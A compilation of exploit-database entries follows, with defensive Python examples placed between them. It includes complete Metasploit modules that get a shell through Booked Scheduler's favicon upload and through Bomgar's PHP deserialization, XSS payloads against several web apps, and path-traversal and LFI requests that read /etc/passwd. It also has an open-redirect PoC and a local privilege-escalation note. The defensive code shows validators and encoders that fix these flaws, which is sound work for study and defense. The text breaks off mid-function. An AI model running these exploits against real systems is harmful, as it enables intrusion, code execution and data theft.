  include Msf::Exploit::Remote::HttpClient 
 
  def initialize
    super(
      'Name'           => 'Booked Scheduler v2.7.5 - Remote Command Execution', 
      'Description'    => %q{
        This module exploits a file upload vulnerability in Booked 2.7.5.
        In the "Look and Feel" section of the management panel, you can modify the Logo, Favicon and CSS files.
        The upload sections have file extension control except for the favicon part.
        You can upload a file with any extension you want through the Favicon field.
        The uploaded file is written to the main directory of the site under the name "custom-favicon".
        After uploading the PHP payload to the main directory, the exploit executes the payload and receives a shell.
      },
      'Author'         => [ 
        'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module 
        ], 
      'License'        => MSF_LICENSE, 
      'References'     => 
        [
          ['URL', 'https://pentest.com.tr/exploits/Booked-2-7-5-Remote-Command-Execution-Metasploit.html'],  
        ], 
      'Platform'       => ['php'], 
      'Arch'           => ARCH_PHP, 
      'Targets'        => 
        [ 
          ['Booked Scheduler v2.7.5', {}] 
        ], 
      'DisclosureDate' => '01 March 2019', 
      'Privileged'     => false,       
      'DefaultTarget' => 0 
    ) 
 
    register_options( 
        [ 
          OptBool.new('SSL', [true, 'Use SSL', false]),
          OptString.new('TARGETURI', [true, 'The base path to Booked', '/']), 
          OptString.new('USER', [true, 'User to login with', 'admin']), 
          OptString.new('PASS', [true, 'Password to login with', 'admin']), 
        ], self.class) 
    end 
##
# Check Exploit Vulnerable
##  
  def check
    res = send_request_cgi({ 
      'method' => 'GET',  
      'uri'    => normalize_uri(target_uri, "/Web/index.php")      
    })

    if res and res.code == 200 and res.body =~ /v2.7.5/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
##
# Exploit Portion
##  
  def exploit 
    res = send_request_cgi({ 
      'method' => 'POST', 
      'uri'    => normalize_uri(target_uri, "/Web/index.php"), 
      'vars_post' => { 
          "email" => datastore['USER'], 
          "password" => datastore['PASS'],
          "captcha" => "",
          "resume" => "",
          "language" => "en_us",
          "login" => "submit" 
           
      } 
    })

    if res and res.code == 302
      print_status("Successful redirection to admin dashboard.")
    else
      return res
    end
 
    get_cookie = res.get_cookies 
    cookie = get_cookie 
##
# Login Access Control
##
    control = send_request_cgi({ 
      'method' => 'GET', 
      'cookie' => cookie, 
      'uri'    => normalize_uri(target_uri, "/Web/dashboard.php")      
    })

    html = control.body
    if html =~ /Dashboard/
      print_good("Login successful")
    else
      print_status("User information is incorrect. Login failed")
      exit 0
    end 
##
# Reading CSRF Token
##
    csrf = send_request_cgi({ 
      'method' => 'GET', 
      'cookie' => cookie, 
      'uri'    => normalize_uri(target_uri, "/Web/admin/manage_theme.php")      
    })

    html = csrf.body
    if html =~ /Look and Feel/
      token = csrf.body.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
      print_status("CSRF Token = #{token}")
    else
      print_status("User information is incorrect. Login failed")
      exit 0
    end 
##
# Loading phase of the vulnerable file
##
    boundary = Rex::Text.rand_text_alphanumeric(29)

    data2 = "-----------------------------#{boundary}"
    data2 << "\r\nContent-Disposition: form-data; name=\"LOGO_FILE\"\r\n\r\n\r\n"
    data2 << "-----------------------------#{boundary}"
    data2 << "\r\nContent-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"akkus.php\""
    data2 << "\r\nContent-Type: text/html\r\n\r\n"
    data2 << payload.encoded
    data2 << "\n\r\n-----------------------------#{boundary}"
    data2 << "\r\nContent-Disposition: form-data; name=\"CSS_FILE\"\r\n\r\n\r\n"
    data2 << "-----------------------------#{boundary}"
    data2 << "\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\r\n"
    data2 << "#{token}"
    data2 << "\r\n-----------------------------#{boundary}--\r\n"

    res = send_request_raw(
      {
        'method' => "POST",
        'uri'     => normalize_uri(target_uri, "/Web/admin/manage_theme.php?action=update"),
        'data' => data2,
        'headers' =>
        {
          'Content-Type'   => "multipart/form-data; boundary=---------------------------#{boundary}",
        },
        'cookie'  => cookie
      })

    if res and res.code == 200
      print_good "Payload was successfully uploaded."
    else
      print_error "Upload failed."
      return
    end 
##
# Command execution and shell retrieval
##
    print_status("Attempting to execute the payload...")

    command = payload.encoded

    res = send_request_cgi(
      {
        'uri'     => normalize_uri(target_uri, "/Web/custom-favicon.php"),
        'cookie'  => cookie
      }, 25)


    if res and res.code == 200
      print_good "Payload executed successfully"
    end    
  end     
end
##
# End
##
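The module description above pins the flaw down: the favicon upload field has no extension control, and whatever is uploaded is written under a server-chosen name. As an added example (Python, not Booked Scheduler's code), the check that field should have applied: accept only an allow-listed extension taken from the client-supplied name, require the content to start with that type's magic bytes, and let the server fix the stored file name. The allow-list, the magic-byte prefixes and the function name are this example's own.

```python
import os

# Allowed favicon types: extension -> byte prefixes the content must start with.
FAVICON_TYPES = {
    ".ico": (b"\x00\x00\x01\x00",),        # ICO header: reserved = 0, image type = 1
    ".png": (b"\x89PNG\r\n\x1a\n",),       # PNG signature
}
STORED_BASENAME = "custom-favicon"


def validate_favicon_upload(client_filename: str, content: bytes) -> tuple:
    """Return (accepted, detail).

    The client name contributes only its extension (after stripping any path),
    the bytes must match the declared type, and the stored name is fixed by the
    server so a name like akkus.php can never reach the web root.
    """
    ext = os.path.splitext(os.path.basename(client_filename))[1].lower()
    if ext not in FAVICON_TYPES:
        return False, f"extension {ext or '(none)'!r} is not an allowed favicon type"
    if not any(content.startswith(sig) for sig in FAVICON_TYPES[ext]):
        return False, f"content does not look like a {ext} file"
    return True, f"{STORED_BASENAME}{ext}"


if __name__ == "__main__":
    # Constructed inputs: a script disguised by name, and a minimal ICO header.
    print(validate_favicon_upload("akkus.php", b"<?php echo 1; ?>"))
    print(validate_favicon_upload("favicon.ico", b"\x00\x00\x01\x00\x01\x00" + bytes(16)))
```

Serving the upload directory with script execution disabled is the complementary control: even a file that slips past validation is then returned as static content rather than run.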
            
# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
# Date: 2022-11-08
# Exploit Author: Rajeshwar Singh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip
# Tested on: Windows/XAMPP
###########################################################################

Payload use = "><script>alert("XSS")</script>

1. Visit URL http://localhost/bsms_ci/
2. Log in with admin credentials
3. Navigate to user Management
4. Click on "Add New System User"
5. Add the payload in the "Name" input field
6. Click save.
7. Visit http://localhost/bsms_ci/index.php/user
8. The XSS payload executes.
            
source: https://www.securityfocus.com/bid/52183/info

Bontq is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/user/user/userinfo/id/2%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://www.example.com/user/reports/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
            
# Exploit Title: Bonjour Service - 'mDNSResponder.exe'  Unquoted Service
Path
# Discovery by: bios
# Discovery Date: 2024-15-07
# Vendor Homepage: https://developer.apple.com/bonjour/
# Tested Version: 3,0,0,10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Bonjour Service    Bonjour Service    C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe    Auto

C:\>systeminfo

Host Name:                 DESKTOP-HFBJOBG
OS Name:                   Microsoft Windows 10 Home
OS Version:                10.0.19045 N/A Build 19045

PS C:\Program Files\Blizzard\Bonjour Service> powershell -command "(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"
3,0,0,10

#Exploit:

There is an unquoted service path in Bonjour Service (mDNSResponder.exe).
This may allow an authorized local user to insert arbitrary code into the
unquoted service path and escalate privileges.
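The wmic pipeline above is the manual check. The script below is an added example, not part of this advisory: it applies the same filter chain (auto-start, outside C:\Windows, image path not wrapped in quotes) to service records and prints the remediated, quoted form an administrator would set with `sc config <name> binPath=`. The records would normally come from `wmic service get name,pathname,startmode` or `Get-CimInstance Win32_Service`; here SAMPLE_SERVICES is constructed inline, with only the Bonjour entry taken from the advisory. Function names (find_unquoted_services, quote_service_path, image_and_args) are the example's own.

```python
import re
from dataclasses import dataclass

# Constructed sample records in the (name, pathname, startmode) shape returned
# by `wmic service get name,pathname,startmode` or Get-CimInstance Win32_Service.
# The Bonjour entry is the one from the advisory; the other three are made up.
SAMPLE_SERVICES = [
    ("Bonjour Service", r"C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe", "Auto"),
    ("VendorAgent", r'"C:\Program Files\Vendor Agent\agent.exe" --service', "Auto"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("ManualTool", r"C:\Program Files\Some Tool\tool.exe", "Manual"),
]

# Splits "<image path ending in .exe><optional arguments>"; the image path is
# the part the service controller hands to CreateProcess.
_IMAGE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE | re.DOTALL)


@dataclass
class Finding:
    name: str
    pathname: str
    remediated: str


def image_and_args(pathname: str):
    """Return (image path, argument string) for an unquoted PathName."""
    m = _IMAGE_RE.match(pathname.strip())
    if not m:
        return pathname.strip(), ""
    return m.group(1), m.group(2) or ""


def is_unquoted_with_spaces(pathname: str) -> bool:
    """True when the image path is unquoted and contains a space: only then does
    the ambiguous lookup described by CWE-428 apply."""
    if pathname.strip().startswith('"'):
        return False
    image, _ = image_and_args(pathname)
    return " " in image


def quote_service_path(pathname: str) -> str:
    """The fix an administrator applies (sc config <name> binPath= ...):
    wrap only the image path in quotes and keep any arguments as they were."""
    if pathname.strip().startswith('"'):
        return pathname.strip()
    image, args = image_and_args(pathname)
    return f'"{image}"{args}'


def find_unquoted_services(services, include_windows_dir: bool = False):
    """Same filter chain as the wmic pipeline: auto-start, outside C:\\Windows,
    image path not quoted. Returns one Finding per affected service."""
    findings = []
    for name, pathname, startmode in services:
        if startmode.lower() != "auto":
            continue
        under_windows = pathname.lstrip('"').lower().startswith("c:\\windows\\")
        if under_windows and not include_windows_dir:
            continue
        if is_unquoted_with_spaces(pathname):
            findings.append(Finding(name, pathname, quote_service_path(pathname)))
    return findings


if __name__ == "__main__":
    for f in find_unquoted_services(SAMPLE_SERVICES):
        print(f"{f.name}\n  current:    {f.pathname}\n  remediated: {f.remediated}")
```

Feeding real output into SAMPLE_SERVICES is a matter of splitting the wmic columns; the check itself is the same. Services under C:\Windows are skipped by default, as in the advisory's pipeline, but `include_windows_dir=True` audits them too.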
            
Advisory ID: HTB23259
Product: Bonita BPM
Vendor: Bonitasoft
Vulnerable Version(s): 6.5.1 and probably prior
Tested Version:  6.5.1 (Windows and Mac OS packages)
Advisory Publication:  May 7, 2015  [without technical details]
Vendor Notification: May 7, 2015 
Vendor Patch: June 9, 2015 
Public Disclosure: June 10, 2015 
Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601]
CVE References: CVE-2015-3897, CVE-2015-3898
Risk Level: High 
CVSSv2 Base Scores: 7.8  (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in Bonita BPM Portal (Bonita's web interface, running by default on port 8080), which can be exploited by a remote, non-authenticated attacker to compromise the vulnerable web application and the web server on which it is hosted.

1) Path Traversal in Bonita BPM Portal: CVE-2015-3897

User-supplied input passed via the "theme" and "location" HTTP GET parameters to the "bonita/portal/themeResource" URL is not properly verified before being used as part of a file name. The attacker may download any system file accessible to the web server user.

The simple PoC below returns the content of the "C:/Windows/system.ini" file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini

The second PoC discloses the content of the "/etc/passwd" file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd


2) Open Redirect in Bonita BPM Portal: CVE-2015-3898

Input passed via the "redirectUrl" HTTP GET parameter to the "/bonita/login.jsp" script and the "/bonita/loginservice" URL is not properly verified before being used as a redirect URL.

After login, the user may be redirected to an arbitrary website:

http://[HOST]/bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/
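Both findings in this advisory come down to a missing containment check on one request parameter. The following Python is an added example, not Bonita's code and not from this advisory: resolve_theme_resource() joins the untrusted "theme" and "location" values under a theme directory and refuses any result outside it, and safe_redirect_target() accepts a redirectUrl only when it is a same-site, path-only target. The theme root directory ("theme_root") and the post-login landing page (DEFAULT_AFTER_LOGIN) are assumptions; TRAVERSAL_THEME is the exact "theme" value from the PoC requests above, kept as test input.

```python
from pathlib import Path
from urllib.parse import urlsplit

# The "theme" value from the advisory's PoC requests, kept here as test input.
TRAVERSAL_THEME = "portal/../../../../../../../../../../../../../../../../"
DEFAULT_AFTER_LOGIN = "/bonita/portal/"   # assumed landing page, not Bonita's real route


class RejectedInput(ValueError):
    """Raised when untrusted input would leave the allowed space."""


def resolve_theme_resource(theme_root, theme: str, location: str) -> Path:
    """Join the untrusted 'theme' and 'location' parameters under theme_root and
    refuse any result outside it. Both sides are resolved first, so '..' segments,
    an absolute 'theme' (pathlib discards everything before an absolute part) and
    symlinked directories are judged by where they actually end up."""
    root = Path(theme_root).resolve()
    candidate = (root / theme / location).resolve()
    if root not in candidate.parents:
        raise RejectedInput(f"resource escapes theme root: theme={theme!r} location={location!r}")
    return candidate


def theme_resource_allowed(theme_root, theme: str, location: str) -> bool:
    """Boolean form of resolve_theme_resource for logging or tests."""
    try:
        resolve_theme_resource(theme_root, theme, location)
    except RejectedInput:
        return False
    return True


def safe_redirect_target(redirect_url: str, default: str = DEFAULT_AFTER_LOGIN) -> str:
    """Return redirect_url only if it is a same-site, path-only target, else the
    default. A protocol-relative value such as '//immuniweb.com/' parses with a
    netloc and is refused, as are absolute URLs, backslashes (browsers normalise
    '\\' to '/') and control characters that could split the Location header."""
    if not redirect_url:
        return default
    try:
        parts = urlsplit(redirect_url)
    except ValueError:            # e.g. malformed IPv6 bracket syntax
        return default
    if parts.scheme or parts.netloc:
        return default
    if not redirect_url.startswith("/") or redirect_url.startswith("//"):
        return default
    if "\\" in redirect_url or any(ord(c) < 0x20 for c in redirect_url):
        return default
    return redirect_url


if __name__ == "__main__":
    root = "theme_root"       # assumed theme directory
    for theme, loc in (("portal", "css/bonita.css"),
                       (TRAVERSAL_THEME, "Windows/system.ini"),
                       (TRAVERSAL_THEME, "etc/passwd")):
        verdict = "allowed" if theme_resource_allowed(root, theme, loc) else "rejected"
        print(f"theme={theme!r} location={loc!r}: {verdict}")
    for target in ("/bonita/portal/homepage", "//immuniweb.com/", "https://immuniweb.com/"):
        print(f"redirectUrl={target!r} -> {safe_redirect_target(target)}")
```

The containment check compares resolved paths rather than looking for "../" in the input, so encoded or doubled separators do not matter: only where the final path lands does. The redirect check is an allow-list on shape (leading single slash, no scheme, no host), which is the form a fix for CWE-601 usually takes when the application only ever needs to return users to its own pages.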


-----------------------------------------------------------------------------------------------

Solution:

Update to Bonita BPM 6.5.3

More Information:
http://community.bonitasoft.com/blog/bonita-bpm-653-available

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23259 - https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open Redirect in Bonita BPM.
[2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process applications - the BPM platform that gives developers freedom to create and manage highly customizable business apps. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize
    super(
      'Name'           => 'Bomgar Remote Support Unauthenticated Code Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the Bomgar Remote Support, which
        deserializes user provided data using PHP's `unserialize` method.
        By providing a specially crafted PHP serialized object, it is possible
        to write arbitrary data to arbitrary files. This effectively allows the
        execution of arbitrary PHP code in the context of the Bomgar Remote Support
        system user.

        To exploit the vulnerability, a valid Logging Session ID (LSID) is required.
        It consists of four key-value pairs (i.e., 'h=[...];l=[...];m=[...];t=[...]')
        and can be retrieved by an unauthenticated user at the end of the process
        of submitting a new issue via the 'Issue Submission' form.

        Versions before 15.1.1 are reported to be vulnerable.
      },
      'Author'         =>
        [
          'Markus Wulftange',
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'May 5 2015',
      'References'     =>
        [
          ['CWE', '94'],
          ['CWE', '502'],
          ['CVE', '2015-0935'],
          ['US-CERT-VU', '978652'],
          ['URL', 'http://codewhitesec.blogspot.com/2015/05/cve-2015-0935-bomgar-remote-support-portal.html'],
        ],
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DefaultOptions' =>
        {
          'RPORT'      => 443,
          'SSL'        => true,
          'TARGETURI'  => '/session_complete',
        },
    )

    register_options(
      [
        OptString.new('LSID', [true, 'Logging Session ID']),
      ], self.class
    )
  end

  def check
    version = detect_version

    if version
      print_status("Version #{version} detected")
      if version < '15.1.1'
        return Exploit::CheckCode::Appears
      else
        return Exploit::CheckCode::Safe
      end
    end

    print_status("Version could not be detected")
    return Exploit::CheckCode::Unknown
  end

  def exploit
    execute_cmdstager

    handler
  end

  def execute_command(cmd, opts)
    tmpfile = "/tmp/#{rand_text_alphanumeric(10)}.php"

    vprint_status("Uploading payload to #{tmpfile} ...")
    upload_php_file(tmpfile, generate_stager_php(cmd))

    vprint_status("Triggering payload in #{tmpfile} ...")
    execute_php_file(tmpfile)
  end

  def detect_version
    res = send_request_raw(
      'uri' => '/'
    )

    if res and res.code == 200 and res.body.to_s =~ /<!--Product Version: (\d+\.\d+\.\d+)-->/
      return $1
    end
  end

  def upload_php_file(filepath, data)
    send_pso(generate_upload_file_pso(filepath, data))
  end

  def execute_php_file(filepath)
    send_pso(generate_autoload_pso(filepath))
  end

  def send_pso(pso)
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => {
        'lsid'    => datastore['LSID'],
        'survey'  => pso,
      }
    )

    if res
      if res.code != 200
        fail_with(Failure::UnexpectedReply, "Unexpected response from server: status code #{res.code}")
      end
      if res.body.to_s =~ />ERROR: ([^<>]+)</
        fail_with(Failure::Unknown, "Error occurred: #{$1}")
      end
    else
      fail_with(Failure::Unreachable, "Error connecting to the remote server")
    end

    res
  end

  def generate_stager_php(cmd)
    "<?php unlink(__FILE__); passthru('#{cmd.gsub(/[\\']/, '\\\\\&')}');"
  end

  def generate_upload_file_pso(filepath, data)
    log_file = PHPObject.new(
      "Log_file",
      {
        "_filename"   => filepath,
        "_lineFormat" => "",
        "_eol"        => data,
        "_append"     => false,
      }
    )
    logger = PHPObject.new(
      "Logger",
      {
        "\0Logger\0_logs" => [ log_file ]
      }
    )
    tracer = PHPObject.new(
      "Tracer",
      {
        "\0Tracer\0_log" => logger
      }
    )

    serialize(tracer)
  end

  def generate_autoload_pso(filepath)
    object = PHPObject.new(
      filepath.chomp('.php').gsub('/', '_'),
      {}
    )

    serialize(object)
  end

  class PHPObject
    attr_reader :name, :members

    def initialize(name, members)
      @name = name
      @members = members
    end
  end

  def serialize(value)
    case value.class.name.split('::').last
      when 'Array' then serialize_array_numeric(value)
      when 'Fixnum', 'Integer' then serialize_integer(value)
      when 'Float' then serialize_double(value)
      when 'Hash' then serialize_array_assoc(value)
      when 'NilClass' then serialize_null
      when 'PHPObject' then serialize_object(value)
      when 'String' then serialize_string(value)
      when 'TrueClass', 'FalseClass' then serialize_boolean(value)
      else raise "Value of #{value.class} cannot be serialized"
    end
  end

  def serialize_array_numeric(a)
    "a:#{a.size}:{" + a.each_with_index.map { |v, i|
      serialize_integer(i) + serialize(v)
    }.join + "}"
  end

  def serialize_array_assoc(h)
    "a:#{h.size}:{" + h.each_pair.map { |k, v|
      serialize_string(k) + serialize(v)
    }.join + "}"
  end

  def serialize_boolean(b)
    "b:#{b ? '1' : '0'};"
  end

  def serialize_double(f)
    "d:#{f};"
  end

  def serialize_integer(i)
    "i:#{i};"
  end

  def serialize_null
    "N;"
  end

  def serialize_object(o)
    "O:#{serialize_string(o.name)[2..-2]}:#{serialize_array_assoc(o.members)[2..-1]}"
  end

  def serialize_string(s)
    "s:#{s.size}:\"#{s}\";"
  end

end
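The module's serialize helpers emit the PHP serialization grammar (`i:`, `s:`, `a:`, `O:` records) so that `unserialize` on the server instantiates the classes named in the input. The receiving side's fix is to never let untrusted input name a class at all: in PHP that is `unserialize($data, ['allowed_classes' => false])`, or better, a format such as JSON that has no object records. The Python below is an added example, not part of the module or of Bomgar's code: a small parser of the same format that accepts scalars and arrays and refuses any `O:` (object) or `C:` (custom-serialized) record, reporting the class name that was attempted so it can be logged. BENIGN_SURVEY and OBJECT_RECORD are constructed samples; the class name "Tracer" is taken from the module above, with an empty placeholder member rather than its gadget chain.

```python
class UnsafeSerializedData(ValueError):
    """Raised when input is malformed or carries anything other than plain data."""


def _read_until(data: bytes, pos: int, delim: bytes):
    end = data.find(delim, pos)
    if end < 0:
        raise UnsafeSerializedData("truncated input")
    return data[pos:end], end + len(delim)


def _expect(data: bytes, pos: int, token: bytes) -> int:
    if data[pos:pos + len(token)] != token:
        raise UnsafeSerializedData(f"expected {token!r} at offset {pos}")
    return pos + len(token)


def _number(raw: bytes, conv):
    try:
        return conv(raw.decode("ascii"))
    except ValueError:
        raise UnsafeSerializedData(f"bad number {raw!r}") from None


def _parse(data: bytes, pos: int, depth: int = 0):
    """Parse one value at `pos`; return (value, position after it)."""
    if depth > 32:
        raise UnsafeSerializedData("nesting too deep")
    tag = data[pos:pos + 1]
    if tag == b"N":                                  # N;
        return None, _expect(data, pos + 1, b";")
    if tag in (b"i", b"d", b"b"):                    # i:5;  d:1.5;  b:1;
        pos = _expect(data, pos + 1, b":")
        raw, pos = _read_until(data, pos, b";")
        if tag == b"i":
            return _number(raw, int), pos
        if tag == b"d":
            return _number(raw, float), pos
        return raw == b"1", pos
    if tag == b"s":                                  # s:6:"rating";
        pos = _expect(data, pos + 1, b":")
        raw_len, pos = _read_until(data, pos, b":")
        length = _number(raw_len, int)
        pos = _expect(data, pos, b'"')
        value = data[pos:pos + length]               # length is in bytes, as PHP counts it
        if len(value) != length:
            raise UnsafeSerializedData("string runs past end of input")
        pos = _expect(data, pos + length, b'";')
        return value.decode("utf-8", errors="replace"), pos
    if tag == b"a":                                  # a:2:{<key><value>...}
        pos = _expect(data, pos + 1, b":")
        raw_count, pos = _read_until(data, pos, b":")
        pos = _expect(data, pos, b"{")
        items = {}
        for _ in range(_number(raw_count, int)):
            key, pos = _parse(data, pos, depth + 1)
            if not isinstance(key, (int, str)):
                raise UnsafeSerializedData("array keys must be int or string")
            items[key], pos = _parse(data, pos, depth + 1)
        return items, _expect(data, pos, b"}")
    if tag == b"O":                                  # O:6:"Tracer":1:{...}  -> refused
        pos = _expect(data, pos + 1, b":")
        raw_len, pos = _read_until(data, pos, b":")
        pos = _expect(data, pos, b'"')
        cls = data[pos:pos + _number(raw_len, int)].decode("utf-8", errors="replace")
        raise UnsafeSerializedData(f"object record for class {cls!r} in untrusted input")
    if tag == b"C":                                  # C: custom (Serializable) record -> refused
        raise UnsafeSerializedData("custom-serialized record in untrusted input")
    raise UnsafeSerializedData(f"unknown type tag {tag!r} at offset {pos}")


def unserialize_data_only(data: bytes):
    """PHP-unserialize untrusted bytes, accepting only scalars and arrays."""
    value, end = _parse(data, 0)
    if end != len(data):
        raise UnsafeSerializedData("trailing bytes after value")
    return value


def rejection_reason(data: bytes):
    """None when the payload is acceptable, otherwise why it was refused."""
    try:
        unserialize_data_only(data)
    except UnsafeSerializedData as exc:
        return str(exc)
    return None


# Constructed samples: a plain survey answer, and an object record of the shape
# the module above emits (class name from the module, member left as a placeholder).
BENIGN_SURVEY = b'a:2:{s:6:"rating";i:5;s:7:"comment";s:5:"great";}'
OBJECT_RECORD = b'O:6:"Tracer":1:{s:12:"\x00Tracer\x00_log";N;}'

if __name__ == "__main__":
    for sample in (BENIGN_SURVEY, OBJECT_RECORD):
        print(sample, "->", rejection_reason(sample) or unserialize_data_only(sample))
```

Because the parser works on bytes, the `\0Class\0member` naming of private properties and the byte-counted `s:` lengths are handled the way PHP handles them; anything the grammar does not recognise, including a trailing payload after a valid value, is refused rather than skipped.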
            
# Exploit Title: BoltWire 6.03 - Local File Inclusion
# Date: 2020-05-02
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.boltwire.com/
# Software Link: https://www.boltwire.com/downloads/go&v=6&r=03
# Version: 6.03
# Tested on: Ubuntu 20.04 LAMP


LFI:

Steps to Reproduce:

1) Using an HTTP GET request, browse to the following page as an authenticated user.
http://192.168.51.169/boltwire/index.php?p=action.search&action=../../../../../../../etc/passwd

Result

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
[SNIPPED]
            
source: https://www.securityfocus.com/bid/51422/info

BoltWire is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

BoltWire 3.4.16 is vulnerable; other versions may also be affected.

http://www.example.com/bolt/field/index.php?p=main&help='"</script><script>alert(document.cookie)</script>
http://www.example.com/bolt/field/index.php?"</a><script>alert(document.cookie)</script></
http://www.example.com/bolt/field/index.php?p=main&action='"</a><script>alert(document.cookie)</script></&file=file.jpg
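The BoltWire payloads above close the surrounding element and open a script tag, while the Boom CMS payloads earlier on this page break out of a JavaScript string literal. The fix for both is output encoding chosen per context, and the Python below is an added example (not from either advisory, not BoltWire's or Boom CMS's code) showing why one encoder is not enough: html_text()/html_attr() escape for element content and quoted attributes, and js_string() builds a JavaScript string literal in which "</script>" can never terminate the block. render_profile() is an assumed template placing the same untrusted value in all three contexts; POLYGLOT and BOLTWIRE are constructed inputs shaped like the PoC payloads.

```python
import html
import json

# Constructed inputs shaped like the PoC payloads: one that breaks out of a
# JavaScript string (Boom CMS style) and one that closes a <script> element
# and opens its own (BoltWire style).
POLYGLOT = "';alert(String.fromCharCode(88,83,83))//\\';\"--></SCRIPT>\"><SCRIPT>alert(1)</SCRIPT>"
BOLTWIRE = "'\"</script><script>alert(document.cookie)</script>"


def html_text(value: str) -> str:
    """Encoder for element content, e.g. <p>{value}</p>."""
    return html.escape(value, quote=True)


def html_attr(value: str) -> str:
    """Encoder for a quoted attribute value, e.g. value="{value}". The template
    must always put quotes around the attribute, or a space would end it."""
    return html.escape(value, quote=True)


# Characters json.dumps leaves alone that matter inside an HTML <script> element.
_JS_EXTRA = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def js_string(value: str) -> str:
    """Encoder for a value embedded in an inline script as a JS string literal.
    json.dumps handles quotes, backslashes and (with ensure_ascii) U+2028/2029;
    HTML-escaping alone is wrong in this context. The extra substitutions make
    sure '</script>' inside the literal can never close the script element."""
    literal = json.dumps(value)
    for ch, esc in _JS_EXTRA.items():
        literal = literal.replace(ch, esc)
    return literal


def render_profile(display_name: str) -> str:
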